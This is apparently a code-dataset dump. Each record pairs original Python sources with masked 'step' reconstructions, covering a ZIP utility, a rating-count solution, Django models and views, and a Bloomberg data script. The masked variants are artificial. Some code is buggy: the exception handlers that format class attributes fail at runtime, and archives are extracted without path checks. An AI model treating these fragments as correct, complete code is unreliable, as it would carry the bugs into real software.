zipfile.ZipFile(archivo, 'r')\n zip_list = zip_ref.infolist()\n for contenido in zip_list:\n zp = contenido.filename\n zip_ref.close()\n return zp\n except PermissionError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) %\n PermissionError.filename % PermissionError.strerror)\n except IOError:\n log.registrar_log_error(__name__, err.EdcaErrores.\n ERR_ZIPTOOL_UNZIP, 'EXTRAER ARCHIVO', msg.EdcaMensajes.\n obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.\n filename % IOError.strerror)\n", "step-5": "\"\"\"\r\nPROYECTO : Portal EDCA-HN\r\nNOMBRE : ZipTools\r\nDescripcion : Clase utilitaria para descomprimir archivos ZIP.\r\n\r\nMM/DD/YYYY Colaboradores Descripcion\r\n05/07/2019 Alla Duenas Creacion. \r\n\"\"\"\r\n\r\nimport zipfile\r\nfrom edca_mensajes import EdcaErrores as err, EdcaMensajes as msg\r\nfrom edca_logs.EdcaLogger import EdcaLogger as log\r\n\r\n\r\nclass ZipTools:\r\n\r\n # Funcion para cromprimir los archivos descargados\r\n @staticmethod\r\n def comprimir(archivo, dir_comprimir):\r\n __archivo_zip = archivo[:archivo.find(\".\")] + \".zip\"\r\n try:\r\n with zipfile.ZipFile(__archivo_zip,'w', zipfile.ZIP_DEFLATED) as archivoZip:\r\n archivoZip.write(archivo)\r\n archivoZip.close()\r\n\r\n except PermissionError:\r\n log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, \"EXTRAER ARCHIVO\",\r\n msg.EdcaMensajes.obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % PermissionError.filename % PermissionError.strerror)\r\n except IOError:\r\n log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, \"EXTRAER ARCHIVO\",\r\n msg.EdcaMensajes.obt_mensaje(\r\n err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.filename % IOError.strerror)\r\n \r\n # Funcion para descromprimir los archivos descargados\r\n @staticmethod\r\n def descomprimir(archivo, dir_extraer):\r\n try:\r\n zip_ref = zipfile.ZipFile(archivo, 'r')\r\n zip_list = zip_ref.infolist()\r\n for contenido in zip_list:\r\n log.registrar_log_info(__name__, err.EdcaErrores.INFO_ZIPTOOL_PRINT_DIR,\r\n \"EXTRAER ARCHIVO\",\r\n msg.EdcaMensajes.obt_mensaje(err.EdcaErrores.INFO_ZIPTOOL_PRINT_DIR) % contenido.filename)\r\n zip_ref.extractall(dir_extraer)\r\n zip_ref.close()\r\n log.registrar_log_info(__name__, err.EdcaErrores.INFO_ZIPTOOL_UNZIP, \"EXTRAER ARCHIVO\",\r\n msg.EdcaMensajes.obt_mensaje(err.EdcaErrores.INFO_ZIPTOOL_UNZIP))\r\n except PermissionError:\r\n log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, \"EXTRAER ARCHIVO\",\r\n msg.EdcaMensajes.obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % PermissionError.filename % PermissionError.strerror)\r\n except IOError:\r\n log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, \"EXTRAER ARCHIVO\",\r\n msg.EdcaMensajes.obt_mensaje(\r\n err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.filename % IOError.strerror)\r\n\r\n @staticmethod\r\n def obtener_contenido_zip(archivo):\r\n global zp\r\n try:\r\n zip_ref = zipfile.ZipFile(archivo, 'r')\r\n zip_list = zip_ref.infolist()\r\n for contenido in zip_list:\r\n zp = contenido.filename\r\n zip_ref.close()\r\n return zp\r\n except PermissionError:\r\n log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, \"EXTRAER ARCHIVO\",\r\n msg.EdcaMensajes.obt_mensaje(err.EdcaErrores.ERR_ZIPTOOL_UNZIP)\r\n % PermissionError.filename % PermissionError.strerror)\r\n except IOError:\r\n log.registrar_log_error(__name__, err.EdcaErrores.ERR_ZIPTOOL_UNZIP, \"EXTRAER ARCHIVO\",\r\n msg.EdcaMensajes.obt_mensaje(\r\n err.EdcaErrores.ERR_ZIPTOOL_UNZIP) % IOError.filename % IOError.strerror)\r\n\r\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
C = {i:0 for i in range(9)} N = int(input()) A = list(map(int,input().split())) for i in range(N): a = A[i] if a<400: C[0] += 1 elif a<800: C[1] += 1 elif a<1200: C[2] += 1 elif a<1600: C[3] += 1 elif a<2000: C[4] += 1 elif a<2400: C[5] += 1 elif a<2800: C[6] += 1 elif a<3200: C[7] += 1 else: C[8] += 1 cmin = 0 for i in range(8): if C[i]>0: cmin += 1 if cmin==0: cmin = 1 cmax = C[8] else: cmax = cmin+C[8] print(cmin,cmax)
normal
{ "blob_id": "a1ca6c258298feda99b568f236611c1c496e3262", "index": 8993, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in range(N):\n a = A[i]\n if a < 400:\n C[0] += 1\n elif a < 800:\n C[1] += 1\n elif a < 1200:\n C[2] += 1\n elif a < 1600:\n C[3] += 1\n elif a < 2000:\n C[4] += 1\n elif a < 2400:\n C[5] += 1\n elif a < 2800:\n C[6] += 1\n elif a < 3200:\n C[7] += 1\n else:\n C[8] += 1\n<mask token>\nfor i in range(8):\n if C[i] > 0:\n cmin += 1\nif cmin == 0:\n cmin = 1\n cmax = C[8]\nelse:\n cmax = cmin + C[8]\nprint(cmin, cmax)\n", "step-3": "C = {i: (0) for i in range(9)}\nN = int(input())\nA = list(map(int, input().split()))\nfor i in range(N):\n a = A[i]\n if a < 400:\n C[0] += 1\n elif a < 800:\n C[1] += 1\n elif a < 1200:\n C[2] += 1\n elif a < 1600:\n C[3] += 1\n elif a < 2000:\n C[4] += 1\n elif a < 2400:\n C[5] += 1\n elif a < 2800:\n C[6] += 1\n elif a < 3200:\n C[7] += 1\n else:\n C[8] += 1\ncmin = 0\nfor i in range(8):\n if C[i] > 0:\n cmin += 1\nif cmin == 0:\n cmin = 1\n cmax = C[8]\nelse:\n cmax = cmin + C[8]\nprint(cmin, cmax)\n", "step-4": "C = {i:0 for i in range(9)}\nN = int(input())\nA = list(map(int,input().split()))\nfor i in range(N):\n a = A[i]\n if a<400:\n C[0] += 1\n elif a<800:\n C[1] += 1\n elif a<1200:\n C[2] += 1\n elif a<1600:\n C[3] += 1\n elif a<2000:\n C[4] += 1\n elif a<2400:\n C[5] += 1\n elif a<2800:\n C[6] += 1\n elif a<3200:\n C[7] += 1\n else:\n C[8] += 1\ncmin = 0\nfor i in range(8):\n if C[i]>0:\n cmin += 1\nif cmin==0:\n cmin = 1\n cmax = C[8]\nelse:\n cmax = cmin+C[8]\nprint(cmin,cmax)", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from rest_framework import serializers from .models import Backend class BackendSerializer(serializers.ModelSerializer): class Meta: model = Backend fields = '__all__'
normal
{ "blob_id": "b4787d65fb8adf5dc6a99c1a13922c8f9acc2087", "index": 1971, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass BackendSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = Backend\n fields = '__all__'\n", "step-3": "from rest_framework import serializers\nfrom .models import Backend\n\n\nclass BackendSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = Backend\n fields = '__all__'\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
# -*- coding: utf-8 -*- """ Created on Mon Feb 20 17:13:46 2017 @author: pmonnot """ import blpapi import datetime # Create a Session session = blpapi.Session() # Start a Session if not session.start(): print "Failed to start session." if not session.openService("//blp/refdata"): print "Failed to open //blp/refdata" refDataService = session.getService("//blp/refdata") request = refDataService.createRequest("HistoricalDataRequest") request.append("securities", "AAPL US Equity") #FIELDS - if simply one field use: #request.append("fields", "PX_LAST") #If you wish to loop the fields field_list = ["PX_OPEN","PX_HIGH","PX_LAST","PX_VOLUME"] for field in field_list: request.append("fields", field) request.set("startDate", "20170101") request.set("endDate", "20170201") request.set("adjustmentFollowDPDF", "False") request.set("adjustmentAbnormal", "True") request.set("adjustmentNormal", "True") request.set("adjustmentSplit", "True") request.set("periodicitySelection", "DAILY") request.set("nonTradingDayFillOption", "NON_TRADING_WEEKDAYS") #also takes ALL_CALENDAR_DAYS and ACTIVE_DAYS_ONLY request.set("nonTradingDayFillMethod", "PREVIOUS_VALUE") print "Sending Request:", request session.sendRequest(request) endReached = False while endReached == False: ev = session.nextEvent() if ev.eventType() == blpapi.Event.RESPONSE or ev.eventType() == blpapi.Event.PARTIAL_RESPONSE: for msg in ev: numPoints = msg.getElement("securityData").getElement("fieldData").numValues() for i in range(0,numPoints): Point = msg.getElement('securityData').getElement('fieldData').getValueAsElement(i) print Point.getElement('date').getValue(),'\t',Point.getElement('PX_LAST').getValue(),'\t' if ev.eventType() == blpapi.Event.RESPONSE: endReached = True
normal
{ "blob_id": "a8a2d672369f61c6412229380cc6097d152ba126", "index": 9883, "step-1": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 20 17:13:46 2017\r\n\r\n@author: pmonnot\r\n\"\"\"\r\n\r\nimport blpapi\r\nimport datetime\r\n\r\n# Create a Session\r\nsession = blpapi.Session()\r\n# Start a Session\r\nif not session.start():\r\n print \"Failed to start session.\"\r\nif not session.openService(\"//blp/refdata\"):\r\n print \"Failed to open //blp/refdata\"\r\n\r\nrefDataService = session.getService(\"//blp/refdata\")\r\nrequest = refDataService.createRequest(\"HistoricalDataRequest\")\r\n\r\nrequest.append(\"securities\", \"AAPL US Equity\")\r\n\r\n#FIELDS - if simply one field use: #request.append(\"fields\", \"PX_LAST\")\r\n#If you wish to loop the fields\r\nfield_list = [\"PX_OPEN\",\"PX_HIGH\",\"PX_LAST\",\"PX_VOLUME\"]\r\nfor field in field_list:\r\n request.append(\"fields\", field)\r\n\r\nrequest.set(\"startDate\", \"20170101\")\r\nrequest.set(\"endDate\", \"20170201\")\r\nrequest.set(\"adjustmentFollowDPDF\", \"False\")\r\nrequest.set(\"adjustmentAbnormal\", \"True\")\r\nrequest.set(\"adjustmentNormal\", \"True\")\r\nrequest.set(\"adjustmentSplit\", \"True\")\r\nrequest.set(\"periodicitySelection\", \"DAILY\")\r\nrequest.set(\"nonTradingDayFillOption\", \"NON_TRADING_WEEKDAYS\") #also takes ALL_CALENDAR_DAYS and ACTIVE_DAYS_ONLY\r\nrequest.set(\"nonTradingDayFillMethod\", \"PREVIOUS_VALUE\")\r\n\r\n\r\n\r\nprint \"Sending Request:\", request\r\nsession.sendRequest(request)\r\n\r\n\r\nendReached = False\r\nwhile endReached == False:\r\n ev = session.nextEvent()\r\n if ev.eventType() == blpapi.Event.RESPONSE or ev.eventType() == blpapi.Event.PARTIAL_RESPONSE:\r\n \r\n for msg in ev:\r\n numPoints = msg.getElement(\"securityData\").getElement(\"fieldData\").numValues()\r\n for i in range(0,numPoints):\r\n Point = msg.getElement('securityData').getElement('fieldData').getValueAsElement(i)\r\n print Point.getElement('date').getValue(),'\\t',Point.getElement('PX_LAST').getValue(),'\\t'\r\n \r\n \r\n if ev.eventType() == blpapi.Event.RESPONSE:\r\n endReached = True", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from django.db import models class Kit(models.Model): name = models.CharField(max_length=100, null=True) main_image_url = models.URLField(max_length=1000) price = models.DecimalField(max_digits=10, decimal_places=2, default=0) description = models.CharField(max_length=1000, null=True) class Meta: db_table = 'kits' class KitSubImageUrl(models.Model): image_url = models.URLField(max_length=1000) kit = models.ForeignKey('kit.Kit', on_delete=models.CASCADE) class Meta: db_table = 'kit_sub_image_urls' class KitLike(models.Model): user = models.ForeignKey('user.User', on_delete=models.CASCADE) kit = models.ForeignKey('kit.Kit', on_delete=models.CASCADE) class Meta: db_table = 'kit_likes'
normal
{ "blob_id": "ea2183530667437e086bc89f137e464dec6f363a", "index": 1800, "step-1": "<mask token>\n\n\nclass KitSubImageUrl(models.Model):\n image_url = models.URLField(max_length=1000)\n kit = models.ForeignKey('kit.Kit', on_delete=models.CASCADE)\n\n\n class Meta:\n db_table = 'kit_sub_image_urls'\n\n\nclass KitLike(models.Model):\n user = models.ForeignKey('user.User', on_delete=models.CASCADE)\n kit = models.ForeignKey('kit.Kit', on_delete=models.CASCADE)\n\n\n class Meta:\n db_table = 'kit_likes'\n", "step-2": "<mask token>\n\n\nclass Kit(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'kits'\n\n\nclass KitSubImageUrl(models.Model):\n image_url = models.URLField(max_length=1000)\n kit = models.ForeignKey('kit.Kit', on_delete=models.CASCADE)\n\n\n class Meta:\n db_table = 'kit_sub_image_urls'\n\n\nclass KitLike(models.Model):\n user = models.ForeignKey('user.User', on_delete=models.CASCADE)\n kit = models.ForeignKey('kit.Kit', on_delete=models.CASCADE)\n\n\n class Meta:\n db_table = 'kit_likes'\n", "step-3": "<mask token>\n\n\nclass Kit(models.Model):\n name = models.CharField(max_length=100, null=True)\n main_image_url = models.URLField(max_length=1000)\n price = models.DecimalField(max_digits=10, decimal_places=2, default=0)\n description = models.CharField(max_length=1000, null=True)\n\n\n class Meta:\n db_table = 'kits'\n\n\nclass KitSubImageUrl(models.Model):\n image_url = models.URLField(max_length=1000)\n kit = models.ForeignKey('kit.Kit', on_delete=models.CASCADE)\n\n\n class Meta:\n db_table = 'kit_sub_image_urls'\n\n\nclass KitLike(models.Model):\n user = models.ForeignKey('user.User', on_delete=models.CASCADE)\n kit = models.ForeignKey('kit.Kit', on_delete=models.CASCADE)\n\n\n class Meta:\n db_table = 'kit_likes'\n", "step-4": "from django.db import models\n\n\nclass Kit(models.Model):\n name = models.CharField(max_length=100, null=True)\n main_image_url = models.URLField(max_length=1000)\n price = models.DecimalField(max_digits=10, decimal_places=2, default=0)\n description = models.CharField(max_length=1000, null=True)\n\n\n class Meta:\n db_table = 'kits'\n\n\nclass KitSubImageUrl(models.Model):\n image_url = models.URLField(max_length=1000)\n kit = models.ForeignKey('kit.Kit', on_delete=models.CASCADE)\n\n\n class Meta:\n db_table = 'kit_sub_image_urls'\n\n\nclass KitLike(models.Model):\n user = models.ForeignKey('user.User', on_delete=models.CASCADE)\n kit = models.ForeignKey('kit.Kit', on_delete=models.CASCADE)\n\n\n class Meta:\n db_table = 'kit_likes'\n", "step-5": null, "step-ids": [ 4, 5, 6, 7 ] }
[ 4, 5, 6, 7 ]
# -*- coding: utf-8 -*- # # Copyright (C) 2011 Taobao .Inc # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. The terms # are also available at http://code.taobao.org/license.html. # # This software consists of voluntary contributions made by many # individuals. For the exact contribution history, see the revision # history and logs, available at http://code.taobao.org/. from django.contrib.auth.decorators import login_required from django.core.urlresolvers import reverse from django.http import * from django import forms from django.db.models import Count,Sum,Q from taocode2.models import * from taocode2.helper.utils import * from taocode2.helper.func import wrap from taocode2.helper import consts from taocode2.apps.user import activity from taocode2.apps.repos import svn from taocode2.settings import * import time __author__ = 'luqi@taobao.com' def build_prj_nav_menu(request, project, choice = None): uri = '/p/'+project.name navmenus = [{'uri': uri + '/src', 'txt':'source'}, {'uri': uri + '/issues', 'txt':'issues'}, {'uri': uri + '/wiki', 'txt':'wiki'}, {'uri': uri + '/info', 'txt':'info'}] if project.owner == request.user: navmenus.append({'uri': uri + '/admin', 'txt':'admin'}) if choice is None: navmenus[0]['choice'] = True else: for m in navmenus: if m['uri'].endswith(choice): m['choice'] = True return navmenus def need_owner(view_func): def _wrapped_view(request, *args, **kwargs): rc = request.rc rc.project = q_get(Project, name=kwargs['name'], status = consts.PROJECT_ENABLE) rc.project_name = kwargs['name'] if rc.project == None: raise Http404 if rc.project.owner != request.user: if request.user.supper is False: return HttpResponseForbidden() return view_func(request, *args, **kwargs) return wrap(view_func, _wrapped_view) def can_access(prj, user): if prj is None or prj.status != consts.PROJECT_ENABLE: raise Http404 if prj.is_public: return None if user.is_authenticated() is False: return HttpResponseForbidden() if prj.owner != user: pm = q_get(ProjectMember, project = prj, user = user) if pm is None: return HttpResponseForbidden() return None def can_write(prj, user): if prj is None or prj.status != consts.PROJECT_ENABLE: return False if user.is_authenticated() is False: return False if prj.owner != user: pm = q_get(ProjectMember, project = prj, user = user) if pm is None: return False return True @need_owner @as_json @login_required def do_invite(request, name): if request.method != 'POST': return False uname = request.POST.get('u', '').strip() if len(uname) <= 0: return False user = q_get(User, Q(name=uname)|Q(email=uname)) if user is None or user == request.user: return False rc = request.rc pm = q_get(ProjectMember, project=rc.project, user=user) if pm is not None: if pm.member_type != consts.PM_ACCEPT_INV: pm.member_type = consts.PM_SEND_INV pm.save() return True pm = ProjectMember() pm.project = rc.project pm.user = user pm.member_type = consts.PM_SEND_INV pm.save() return True @login_required @need_owner def project_admin(request, name): rc = request.rc rc.pagename = name + ' admin' uri = request.META['PATH_INFO'] #rc.navmenus = [{'uri': uri, 'txt':'basic', 'choice':True}, # {'uri': uri + 'resources', 'txt':'resources'}] rc.navmenus = build_prj_nav_menu(request, rc.project, 'admin') res = [] vls = q_gets(Issue, project = rc.project, status__in = (consts.ISSUE_OPEN, consts.ISSUE_CLOSED)).values('project').annotate(pc=Count('project')) res.append(['Issue Count', len(vls) > 0 and vls[0]['pc'] or 0]) vls = q_gets(ProjectAttachment, project = rc.project, status = consts.FILE_ENABLE).values('project').annotate(pc=Count('project')) res.append(['Attachemts Count', len(vls) > 0 and vls[0]['pc'] or 0]) vls = q_gets(ProjectAttachment, project = rc.project, status = consts.FILE_ENABLE).values('project').annotate(ps=Sum('size')) si = (len(vls) > 0 and vls[0]['ps'] or 0) / (1024*1024.0) res.append(['Attachemts Total Size','%.4s MB'%si]) r,out, err = exec_cmd(['du','-sbh', os.path.join(settings.REPOS_ROOT, name)]) res.append(['Repository Usage', r != 0 and '0.0 MB' or out.split()[0]]) rc.res = res rc.licenses = map(lambda x:x[0], consts.LICENSES) if rc.project.status != consts.PROJECT_ENABLE: raise Http404 return send_response(request, 'project/admin.html') @login_required @need_owner def project_resources(request, name): rc = request.rc rc.pagename = 'Project resources usages' uri = '/p/'+name+'/admin' rc.navmenus = [{'uri': uri, 'txt':'basic'}, {'uri': uri + 'resouces', 'txt':'resources', 'choice':True}] if rc.project.status != consts.PROJECT_ENABLE: raise Http404 return send_response(request, 'project/resources.html') @as_json def get_members(request, name): project = q_get(Project, name=name) if project is None: return False resp = can_access(project, request.user) if resp is not None: return False members = q_gets(ProjectMember, project=project) return (True, [m.json() for m in members]) def do_invite_op(request, name, op): if request.method != 'POST': return False project = q_get(Project, Q(name=name)) if project is None: return False pm = q_get(ProjectMember, project=project, user=request.user) if pm is None: return False pm.member_type = op pm.save() if op == consts.PM_ACCEPT_INV: activity.join_member(project, request.user, request.user) return True @as_json @login_required def do_accept(request, name): return do_invite_op(request, name, consts.PM_ACCEPT_INV) @as_json @login_required def do_reject(request, name): return do_invite_op(request, name, consts.PM_REJECT_INV) @as_json @login_required def do_exit(request, name): project = q_get(Project, name = name) if project is None: return False ProjectMember.objects.filter(project = project, user = request.user).delete() activity.leave_member(project, request.user, request.user) return True @login_required @need_owner @as_json def del_member(request, name): if request.method != 'POST': return False uname = request.POST.get('u', '').strip() if len(uname) <= 0: return False rc = request.rc ProjectMember.objects.filter(project = rc.project, user = User.objects.filter(name=uname)).delete() return True @login_required @need_owner @as_json def del_prj(request, name): if request.method != 'POST': return False del_name = name + '__DELETED__%s'%time.time() project = request.rc.project old_name = project.name project.name = del_name project.status = consts.PROJECT_MARK_DELETED project.save() svn.del_repos(old_name, del_name) return (True, reverse('apps.user.views.view_user', args=[])) @login_required @need_owner @as_json def edit_prj(request, name): if request.method != 'POST': return False project = request.rc.project title = request.POST.get('t','').strip() if len(title) <= 0: return False license = request.POST.get('l','').strip() is_public = request.POST.get('pub','0').strip() project.title = title project.license = license project.is_public = bool(int(is_public)) project.save() return True
normal
{ "blob_id": "bacd0c729193f064b21ab8e01e98dfc276094458", "index": 7853, "step-1": "<mask token>\n\n\ndef need_owner(view_func):\n\n def _wrapped_view(request, *args, **kwargs):\n rc = request.rc\n rc.project = q_get(Project, name=kwargs['name'], status=consts.\n PROJECT_ENABLE)\n rc.project_name = kwargs['name']\n if rc.project == None:\n raise Http404\n if rc.project.owner != request.user:\n if request.user.supper is False:\n return HttpResponseForbidden()\n return view_func(request, *args, **kwargs)\n return wrap(view_func, _wrapped_view)\n\n\ndef can_access(prj, user):\n if prj is None or prj.status != consts.PROJECT_ENABLE:\n raise Http404\n if prj.is_public:\n return None\n if user.is_authenticated() is False:\n return HttpResponseForbidden()\n if prj.owner != user:\n pm = q_get(ProjectMember, project=prj, user=user)\n if pm is None:\n return HttpResponseForbidden()\n return None\n\n\n<mask token>\n\n\n@login_required\n@need_owner\ndef project_admin(request, name):\n rc = request.rc\n rc.pagename = name + ' admin'\n uri = request.META['PATH_INFO']\n rc.navmenus = build_prj_nav_menu(request, rc.project, 'admin')\n res = []\n vls = q_gets(Issue, project=rc.project, status__in=(consts.ISSUE_OPEN,\n consts.ISSUE_CLOSED)).values('project').annotate(pc=Count('project'))\n res.append(['Issue Count', len(vls) > 0 and vls[0]['pc'] or 0])\n vls = q_gets(ProjectAttachment, project=rc.project, status=consts.\n FILE_ENABLE).values('project').annotate(pc=Count('project'))\n res.append(['Attachemts Count', len(vls) > 0 and vls[0]['pc'] or 0])\n vls = q_gets(ProjectAttachment, project=rc.project, status=consts.\n FILE_ENABLE).values('project').annotate(ps=Sum('size'))\n si = (len(vls) > 0 and vls[0]['ps'] or 0) / (1024 * 1024.0)\n res.append(['Attachemts Total Size', '%.4s MB' % si])\n r, out, err = exec_cmd(['du', '-sbh', os.path.join(settings.REPOS_ROOT,\n name)])\n res.append(['Repository Usage', r != 0 and '0.0 MB' or out.split()[0]])\n rc.res = res\n rc.licenses = map(lambda x: x[0], consts.LICENSES)\n if rc.project.status != consts.PROJECT_ENABLE:\n raise Http404\n return send_response(request, 'project/admin.html')\n\n\n@login_required\n@need_owner\ndef project_resources(request, name):\n rc = request.rc\n rc.pagename = 'Project resources usages'\n uri = '/p/' + name + '/admin'\n rc.navmenus = [{'uri': uri, 'txt': 'basic'}, {'uri': uri + 'resouces',\n 'txt': 'resources', 'choice': True}]\n if rc.project.status != consts.PROJECT_ENABLE:\n raise Http404\n return send_response(request, 'project/resources.html')\n\n\n<mask token>\n\n\n@as_json\n@login_required\ndef do_accept(request, name):\n return do_invite_op(request, name, consts.PM_ACCEPT_INV)\n\n\n<mask token>\n\n\n@as_json\n@login_required\ndef do_exit(request, name):\n project = q_get(Project, name=name)\n if project is None:\n return False\n ProjectMember.objects.filter(project=project, user=request.user).delete()\n activity.leave_member(project, request.user, request.user)\n return True\n\n\n<mask token>\n\n\n@login_required\n@need_owner\n@as_json\ndef del_prj(request, name):\n if request.method != 'POST':\n return False\n del_name = name + '__DELETED__%s' % time.time()\n project = request.rc.project\n old_name = project.name\n project.name = del_name\n project.status = consts.PROJECT_MARK_DELETED\n project.save()\n svn.del_repos(old_name, del_name)\n return True, reverse('apps.user.views.view_user', args=[])\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef build_prj_nav_menu(request, project, choice=None):\n uri = '/p/' + project.name\n navmenus = [{'uri': uri + '/src', 'txt': 'source'}, {'uri': uri +\n '/issues', 'txt': 'issues'}, {'uri': uri + '/wiki', 'txt': 'wiki'},\n {'uri': uri + '/info', 'txt': 'info'}]\n if project.owner == request.user:\n navmenus.append({'uri': uri + '/admin', 'txt': 'admin'})\n if choice is None:\n navmenus[0]['choice'] = True\n else:\n for m in navmenus:\n if m['uri'].endswith(choice):\n m['choice'] = True\n return navmenus\n\n\ndef need_owner(view_func):\n\n def _wrapped_view(request, *args, **kwargs):\n rc = request.rc\n rc.project = q_get(Project, name=kwargs['name'], status=consts.\n PROJECT_ENABLE)\n rc.project_name = kwargs['name']\n if rc.project == None:\n raise Http404\n if rc.project.owner != request.user:\n if request.user.supper is False:\n return HttpResponseForbidden()\n return view_func(request, *args, **kwargs)\n return wrap(view_func, _wrapped_view)\n\n\ndef can_access(prj, user):\n if prj is None or prj.status != consts.PROJECT_ENABLE:\n raise Http404\n if prj.is_public:\n return None\n if user.is_authenticated() is False:\n return HttpResponseForbidden()\n if prj.owner != user:\n pm = q_get(ProjectMember, project=prj, user=user)\n if pm is None:\n return HttpResponseForbidden()\n return None\n\n\ndef can_write(prj, user):\n if prj is None or prj.status != consts.PROJECT_ENABLE:\n return False\n if user.is_authenticated() is False:\n return False\n if prj.owner != user:\n pm = q_get(ProjectMember, project=prj, user=user)\n if pm is None:\n return False\n return True\n\n\n@need_owner\n@as_json\n@login_required\ndef do_invite(request, name):\n if request.method != 'POST':\n return False\n uname = request.POST.get('u', '').strip()\n if len(uname) <= 0:\n return False\n user = q_get(User, Q(name=uname) | Q(email=uname))\n if user is None or user == request.user:\n return False\n rc = request.rc\n pm = q_get(ProjectMember, project=rc.project, user=user)\n if pm is not None:\n if pm.member_type != consts.PM_ACCEPT_INV:\n pm.member_type = consts.PM_SEND_INV\n pm.save()\n return True\n pm = ProjectMember()\n pm.project = rc.project\n pm.user = user\n pm.member_type = consts.PM_SEND_INV\n pm.save()\n return True\n\n\n@login_required\n@need_owner\ndef project_admin(request, name):\n rc = request.rc\n rc.pagename = name + ' admin'\n uri = request.META['PATH_INFO']\n rc.navmenus = build_prj_nav_menu(request, rc.project, 'admin')\n res = []\n vls = q_gets(Issue, project=rc.project, status__in=(consts.ISSUE_OPEN,\n consts.ISSUE_CLOSED)).values('project').annotate(pc=Count('project'))\n res.append(['Issue Count', len(vls) > 0 and vls[0]['pc'] or 0])\n vls = q_gets(ProjectAttachment, project=rc.project, status=consts.\n FILE_ENABLE).values('project').annotate(pc=Count('project'))\n res.append(['Attachemts Count', len(vls) > 0 and vls[0]['pc'] or 0])\n vls = q_gets(ProjectAttachment, project=rc.project, status=consts.\n FILE_ENABLE).values('project').annotate(ps=Sum('size'))\n si = (len(vls) > 0 and vls[0]['ps'] or 0) / (1024 * 1024.0)\n res.append(['Attachemts Total Size', '%.4s MB' % si])\n r, out, err = exec_cmd(['du', '-sbh', os.path.join(settings.REPOS_ROOT,\n name)])\n res.append(['Repository Usage', r != 0 and '0.0 MB' or out.split()[0]])\n rc.res = res\n rc.licenses = map(lambda x: x[0], consts.LICENSES)\n if rc.project.status != consts.PROJECT_ENABLE:\n raise Http404\n return send_response(request, 'project/admin.html')\n\n\n@login_required\n@need_owner\ndef project_resources(request, name):\n rc = request.rc\n rc.pagename = 'Project resources usages'\n uri = '/p/' + name + '/admin'\n rc.navmenus = [{'uri': uri, 'txt': 'basic'}, {'uri': uri + 'resouces',\n 'txt': 'resources', 'choice': True}]\n if rc.project.status != consts.PROJECT_ENABLE:\n raise Http404\n return send_response(request, 'project/resources.html')\n\n\n<mask token>\n\n\ndef do_invite_op(request, name, op):\n if request.method != 'POST':\n return False\n project = q_get(Project, Q(name=name))\n if project is None:\n return False\n pm = q_get(ProjectMember, project=project, user=request.user)\n if pm is None:\n return False\n pm.member_type = op\n pm.save()\n if op == consts.PM_ACCEPT_INV:\n activity.join_member(project, request.user, request.user)\n return True\n\n\n@as_json\n@login_required\ndef do_accept(request, name):\n return do_invite_op(request, name, consts.PM_ACCEPT_INV)\n\n\n@as_json\n@login_required\ndef do_reject(request, name):\n return do_invite_op(request, name, consts.PM_REJECT_INV)\n\n\n@as_json\n@login_required\ndef do_exit(request, name):\n project = q_get(Project, name=name)\n if project is None:\n return False\n ProjectMember.objects.filter(project=project, user=request.user).delete()\n activity.leave_member(project, request.user, request.user)\n return True\n\n\n@login_required\n@need_owner\n@as_json\ndef del_member(request, name):\n if request.method != 'POST':\n return False\n uname = request.POST.get('u', '').strip()\n if len(uname) <= 0:\n return False\n rc = request.rc\n ProjectMember.objects.filter(project=rc.project, user=User.objects.\n filter(name=uname)).delete()\n return True\n\n\n@login_required\n@need_owner\n@as_json\ndef del_prj(request, name):\n if request.method != 'POST':\n return False\n del_name = name + '__DELETED__%s' % time.time()\n project = request.rc.project\n old_name = project.name\n project.name = del_name\n project.status = consts.PROJECT_MARK_DELETED\n project.save()\n svn.del_repos(old_name, del_name)\n return True, reverse('apps.user.views.view_user', args=[])\n\n\n@login_required\n@need_owner\n@as_json\ndef edit_prj(request, name):\n if request.method != 'POST':\n return False\n project = request.rc.project\n title = request.POST.get('t', '').strip()\n if len(title) <= 0:\n return False\n license = request.POST.get('l', '').strip()\n is_public = request.POST.get('pub', '0').strip()\n project.title = title\n project.license = license\n project.is_public = bool(int(is_public))\n project.save()\n return True\n", "step-3": "<mask token>\n__author__ = 'luqi@taobao.com'\n\n\ndef build_prj_nav_menu(request, project, choice=None):\n uri = '/p/' + project.name\n navmenus = [{'uri': uri + '/src', 'txt': 'source'}, {'uri': uri +\n '/issues', 'txt': 'issues'}, {'uri': uri + '/wiki', 'txt': 'wiki'},\n {'uri': uri + '/info', 'txt': 'info'}]\n if project.owner == request.user:\n navmenus.append({'uri': uri + '/admin', 'txt': 'admin'})\n if choice is None:\n navmenus[0]['choice'] = True\n else:\n for m in navmenus:\n if m['uri'].endswith(choice):\n m['choice'] = True\n return navmenus\n\n\ndef need_owner(view_func):\n\n def _wrapped_view(request, *args, **kwargs):\n rc = request.rc\n rc.project = q_get(Project, name=kwargs['name'], status=consts.\n 